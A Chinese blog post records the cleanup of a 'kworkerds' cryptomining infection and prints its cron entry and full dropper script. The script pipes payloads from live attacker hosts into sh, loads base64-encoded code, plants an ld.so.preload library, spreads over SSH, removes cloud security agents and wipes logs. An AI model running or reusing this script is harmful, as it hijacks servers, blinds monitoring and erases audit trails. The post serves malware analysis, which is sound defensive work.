昨天一朋友的公司服务器中了挖矿病毒,一起帮忙查看并做下记录。
 

病毒信息

名称:kworkerds

目录:/tmp/

关键点:文件 -i 属性
 
i :这个i可就很厉害了。它可以让一个文件“不能被删除、改名,设置连接也无法写入或添加据。” 对于系统安全性有相当大的 
帮助。只有root能设置此属性。
通常系统管理员有能力判断这个文件是否可以被删除。
参考 :chattr -i root 也没办法随意删除
 
执行chattr -i thisxxs去掉i属性
 
crontab -l

*/ * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh

##

病毒脚本

 
#!/bin/bash

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function b() {

pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

rm -rf /tmp/qW3xT. /tmp/ddgs. /tmp/ddgs. /tmp/wnTKYg /tmp/2t3ik

ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "cranbery" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -

ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep /opt/yilu/mservice|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -

p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)

if [ ${p} -eq  ];then

    ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -

fi

}

function d() {

    ARCH=$(uname -i)

    if [ "$ARCH" == "x86_64" ]; then

        (curl -fsSL --connect-timeout  https://master.clminer.ru/1/1551434761x2728329064.jpg -o /tmp/kworkerds||wget https://master.clminer.ru/1/1551434761x2728329064.jpg -O /tmp/kworkerds) && chmod +x /tmp/kworkerds

        /tmp/kworkerds

    else

        mkdir -p /var/tmp

        chmod  /var/tmp

        (curl -fsSL --connect-timeout  https://master.clminer.ru/2/1551434778x2728329032.jpg -o /var/tmp/kworkerds||wget https://master.clminer.ru/2/1551434778x2728329032.jpg -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds

        /var/tmp/kworkerds

    fi

}

function e() {

    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovLzE4NS4xMC42OC45MS9yYXcvOThzZGY2OTEnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBleGVjKHBhZ2UpCmV4Y2VwdDoKICAgIHBhc3M='))" >/dev/null >& &

    touch /tmp/.38t9guft0055d0565u444gtjr0

}

function c() {

    chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload

    (curl -fsSL --connect-timeout  http://185.10.68.91/2/2 -o /usr/local/bin/dns||wget http://185.10.68.91/2/2 -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns

    echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab

    echo -e "*/10 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root

    echo -e "*/17 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache

    echo -e "*/23 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root

    mkdir -p /var/spool/cron/crontabs

    echo -e "*/31 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root

    mkdir -p /etc/cron.hourly

    (curl -fsSL --connect-timeout  http://185.10.68.91/1/1 -o /etc/cron.hourly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner

    mkdir -p /etc/cron.daily

    (curl -fsSL --connect-timeout  http://185.10.68.91/1/1 -o /etc/cron.daily/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner

    mkdir -p /etc/cron.monthly

    (curl -fsSL --connect-timeout  http://185.10.68.91/1/1 -o /etc/cron.monthly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner

    mkdir -p /usr/local/lib/

    if [ ! -f "/usr/local/lib/libntpd.so" ]; then

        ARCH=$(uname -i)

        if [ "$ARCH" == "x86_64" ]; then

            (curl -fsSL --connect-timeout  https://master.clminer.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so

        elif [ "$ARCH" == "i386" ]; then

            (curl -fsSL --connect-timeout  https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so

        else

            (curl -fsSL --connect-timeout  https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so

        fi

    fi

    chattr -i /etc/ld.so.preload && echo /usr/local/lib/libntpd.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload

    if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then

          for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout= -oStrictHostKeyChecking=no $h '(curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh' & done

    fi

    touch -acmr /bin/sh /etc/cron.hourly/oanacroner

    touch -acmr /bin/sh /etc/cron.daily/oanacroner

    touch -acmr /bin/sh /etc/cron.monthly/oanacroner

}

function a() {

    if ps aux | grep -i '[a]liyun'; then

        wget http://update.aegis.aliyun.com/download/uninstall.sh

        chmod +x uninstall.sh

        ./uninstall.sh

        wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh

        chmod +x quartz_uninstall.sh

        ./quartz_uninstall.sh

        rm -f uninstall.sh     quartz_uninstall.sh

        pkill aliyun-service

        rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service

        rm -rf /usr/local/aegis*;

    elif ps aux | grep -i '[y]unjing'; then

        /usr/local/qcloud/stargate/admin/uninstall.sh

        /usr/local/qcloud/YunJing/uninst.sh

        /usr/local/qcloud/monitor/barad/admin/uninstall.sh

    fi

    touch /tmp/.a

}

mkdir -p /tmp

chmod  /tmp

if [ ! -f "/tmp/.a" ]; then

    a

fi

b

c

port=$(netstat -an | grep : | wc -l)

if [ ${port} -eq  ];then

    d

fi

if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then

    e

fi

echo >/var/spool/mail/root

echo >/var/log/wtmp

echo >/var/log/secure

echo >/var/log/cron
 

处理参考

kworkerds挖矿木马的更多相关文章

  1. kworkerds 挖矿木马简单分析及清理

    公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次挖矿木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助. 现象 top 命令查看,显示 CPU 占用 100%,进 ...

  2. 云服务器ECS挖矿木马病毒处理和解决方案

    云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满 ...

  3. Mac下一款门罗币挖矿木马的简要分析

    背景 最近在应急中发现了一款Mac上的挖矿木马,目标是挖门罗币,经过走访,受害用户都有从苹果电脑上安装第三方dmg的经历(其中可以确定一款LOL Mac私服安装app会导致该木马),怀疑在网上很多第三 ...

  4. 威胁快报|Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复

    背景 近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件. 值得注意的是, ...

  5. 威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板”

    简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件.除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐 ...

  6. 记一次Xmrig挖矿木马排查过程

    问题现象 Linux 服务器收到报警信息,主机 CPU 跑满. 自动创建运行 Docker 容器 xmrig, 导致其他运行中容器被迫停止. 问题原因 通过 top 命令可以看到有一个 xmrig 进 ...

  7. confluence 挖矿木马应急响应

    最近遇到一台confluence wiki主机被挖矿,收到CPU 告警异常之后,登录查看,进行分析. top c 命令查看,果然CPU 已经资源已经被吃完了.. 看到用户是confluence,100 ...

  8. 记一次服务器被植入挖矿木马cpu飙升200%解决过程

    线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序.突然一则噩耗从前线传来:网站不能访问了. 此项目是我负责,我以150+的手速立即打开了服务器 ...

  9. Linux的挖矿木马病毒清除(kswapd0进程)

    1.top查看资源使用情况 看到这些进程一直在变化,但是,主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是挖矿进程 2.排查kswapd0进程 执行命令netsta ...

随机推荐

  1. PAT 1011 World Cup Betting (20分) 比较大小难度级别

    题目 With the 2010 FIFA World Cup running, football fans the world over were becoming increasingly exc ...

  2. Kubernetes实战 - 从零开始搭建微服务 1 - 使用kind构建一个单层架构Node/Express网络应用程序

    使用kind构建一个单层架构Node/Express网络应用程序 Kubernetes实战-从零开始搭建微服务 1 前言 准备写一个Kubernetes实战系列教程,毕竟cnblogs作为国内最早的技 ...

  3. react项目中使用less并修改antd主题样式

    一.react项目中使用less 1. 安装配置 npm i -D less less-loader 2. 查看webpack配置 npm run eject 此操作不可逆,生成新的目录. 3. 修改 ...

  4. MySQL索引及查询优化

    mysql 索引 1.索引介绍 索引按数据结构分可分为哈希表,有序数组,搜索树,跳表: 哈希表适用于只有等值查询的场景 有序数组适用于有等值查询和范围查询的场景,但有序数组索引的更新代价很大,所以最好 ...

  5. 基于 abp vNext 和 .NET Core 开发博客项目 - 统一规范API,包装返回模型

    上一篇文章(https://www.cnblogs.com/meowv/p/12916613.html)使用自定义仓储完成了简单的增删改查案例,有心的同学可以看出,我们的返回参数一塌糊涂,显得很不友好 ...

  6. 太高效了!玩了这么久的Linux,居然不知道这7个终端快捷键!

    大家好,我是良许. 作为 Linux 用户,大家肯定在 Linux 终端下敲过无数的命令.有的命令很短,比如:ls .cd .pwd 之类,这种命令大家毫无压力.但是,有些命令就比较长了,比如: $ ...

  7. 常用的code snipper

    Xcode 10.2.1 版本,自动代码提示功能延迟很大,很多情况下代码提示甚至会无效,但是code snippet 唤起的响应很快,从提高效率的情况考虑,即使系统提供的代码提示制作成code sni ...

  8. 【网络安全】【02】Windows系统如何屏蔽自动更新

    一.win键 + r   ==>  输入  services.msc 二. win键 + r   ==>  输入  gpedit.msc PS:我的电脑基本两年没有更新过了  -_-

  9. java三个时间类常用法

    1.System.currentTimeMillis();    获取当前时间戳    System的获取时间戳的方法,只能获取不能进行其他的操作,简单的毫秒计算可以使用 2.Date(),Date( ...

  10. JAVA 基础知识。程序运方法。

    dos     常用命令    dir     查看此文件夹目录下的所有程序    cd..    返回上一层目录    盘符:  直接切换至相应的盘符    cd 目录 切换至指定的目录    cd ...